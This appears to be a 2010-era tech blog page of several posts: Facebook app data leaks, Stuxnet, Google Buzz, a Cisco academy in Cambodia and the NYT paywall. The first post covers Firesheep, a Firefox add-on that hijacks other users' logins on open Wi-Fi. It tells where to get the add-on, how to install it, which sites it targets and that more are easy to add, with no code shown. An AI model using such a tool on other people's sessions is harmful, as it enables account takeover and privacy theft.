Eric Butler’s new ‘hack Facebook’ plugin for Firefox

Oh the mischief this new Firefox plugin is going to cause.

Firesheep adds a sidebar to Mozilla’s Firefox browser that shows when anyone on an open network — such as a coffee shop’s Wi-Fi network — visits an insecure site. “Double-click on someone [in the sidebar] and you’re instantly logged on as them,” said [plugin author Eric] Butler in his short description of his add-on.

Computer World says the Firesheep add-on has been downloaded more than 50,000 times since it was released Sunday. You can download Firesheep from Butler’s Web site. It’s extremely easy to install: just download the .xpi file; drag it to a Firefox window; and restart.

And it’s not just Facebook that Butler’s plugin makes double-click hackable, either. Others include:

  • Amazon.com
  • Basecamp
  • bit.ly
  • CNET
  • Dropbox
  • Facebook
  • Flickr
  • Foursquare
  • Google
  • Gowalla
  • Windows Live
  • Tumblr
  • Twitter
  • WordPress
  • Yahoo
  • Yelp
  • and others

The plugin is relatively easy to customize, too, meaning that someone with not much more than basic programming skills could easily add other domains to Firesheep’s default list. TechCrunch offers a pretty thorough explanation of how Firesheep works and the plugin’s impact, as well as a possible defense. The truth is, though, using the Internet on a public Wi-Fi network is inherently insecure. But that isn’t news, is it?

More privacy troubles for Facebook

Facebook — for reasons of apathy, negligence or worse — still cannot secure the private details of its users.

Many of the most popular applications, or “apps,” on the social-networking site Facebook Inc. have been transmitting identifying information—in effect, providing access to people’s names and, in some cases, their friends’ names—to dozens of advertising and Internet tracking companies, a Wall Street Journal investigation has found.

The issue affects tens of millions of Facebook app users, including people who set their profiles to Facebook’s strictest privacy settings. The practice breaks Facebook’s rules, and renews questions about its ability to keep identifiable information about its users’ activities secure.

This unlikely will be the last time that the personal details of Facebook users get exploited for company benefit. Since its earliest beginnings, Facebook has gobsmacked many with its profoundly cynical privacy policies. At first, people were outraged. Then they were just angry. Now, the site is so large and so popular, and it has been pimping its users’ data for so long, that news of more blatant privacy violations elicits hardly more than a sigh.

I guess Zuckerberg was right after all.

Weaponized software

Iran is fighting off a significant cyber attack, reports The New York Times. The worm, dubbed Stuxnet, represents a hellish breakthrough in the evolution of computer viruses.

Stuxnet, which was first publicly identified several months ago, is aimed solely at industrial equipment made by Siemens that controls oil pipelines, electric utilities, nuclear facilities and other large industrial sites. While it is not clear that Iran was the main target — the infection has also been reported in Indonesia, Pakistan, India and elsewhere — a disproportionate number of computers inside Iran appear to have been struck, according to reports by computer security monitors.

The Christian Science Monitor first reported on Stuxnet in June.  The primary source of the CSM story was computer security expert Ralph Langner, who has been chronicling his research of the virus on his Web site. Langner called Stuxnet the “hack of the century,” and said “Stuxnet is going to be the best studied piece of malware in history.”

Wired magazine, unsurprisingly, has the definitive story.

“It’s the most complex piece of malware we’ve seen in the last five years or more,” says Nicolas Falliere, a code analyst at security firm Symantec. “It’s the first known time that malware is not targeting credit card [data], is not trying to steal personal user data, but is attacking real-world processing systems. That’s why it’s unique and is not over-hyped.”

… Eric Byres, chief technology officer for Byres Security, says the malware isn’t content to just inject a few commands into the PLC [Programmable Logic Controller] but does “massive reworking” of it.

“They’re massively trying to do something different than the processor was designed to do,” says Byres, who has extensive experience maintaining and troubleshooting Siemens control systems. “Every function block takes a fair amount of work to write, and they’re trying to do something quite radically different. And they’re not doing it in a light way. Whoever wrote this was really trying to mess with that PLC. We’re talking man-months, if not years, of coding to make it work the way it did.”

Cisco goes to Battambang

More evidence that Cambodia is on the fast track to the 21st century:

Cisco  today announced the launch of a Cisco(R) Networking Academy(R) at the University of Management and Economics, expanding the program further into Cambodia. UME will integrate the IT Essentials course into the core curriculum for students at the provincial campus in Battambang.

Not Phnom Penh. Battambang!

Google’s new Facebook killer

In a direct assault on Facebook, Google has entered the social-networking wars with Google Buzz, a Gmail-integrated social-networking application. According to Google’s Todd Jackson, Buzz’s product manager, Buzz’s main features include:

  1. Auto-following
  2. Rich, fast sharing experience
  3. Public and private sharing
  4. Inbox integration
  5. Just the good stuff

According to a press release from Google:

The most noticeable advantage to Google Buzz is the way that e-mail comments and media, such as photos and videos, can be shared. Google Buzz automatically ‘follows’ the people who you communicate with most. Rather than broadcasting a passive “status message” like Facebook or “tweet” like Twitter, Google Buzz engages your friends by making the content that you find interesting available to them

Most of the buzz about Buzz centers around its real-time commenting features and its mobile integration, including voice recognition, which allows users to comment with voice only. No keyboard required! For developers, Google provides a Buzz API.

Not everyone, however, is enamored. And privacy issues have already been raised.

The Official Google blog has all the details.

The NYT paywall will return

New York Magazine blogger Gabriel Sherman says the return of the New York Times paywall is imminent.

After a year of often tumultuous debate, The Gray Lady appears settled on a metered system similar to the one used by The Financial Times. Readers are allotted a certain amount of free stories per month, and beyond that readers must subscribe.

The Times toyed with a similar pay-per-view scheme a few years ago. In 2005, the paper launched TimesSelect, which made opinion pieces and other editorial  content available only by subscription. The Times discontinued TimesSelect in 2007. At the time, the paper admitted that making content free and deriving revenue from advertising was financially smarter than the subscription-based model. That is apparently no longer the case.

Closer to home, DAP News is free. The Phnom Penh Post charges for content more than 90 days old. And The Cambodia Daily makes available only a very small selection of stories.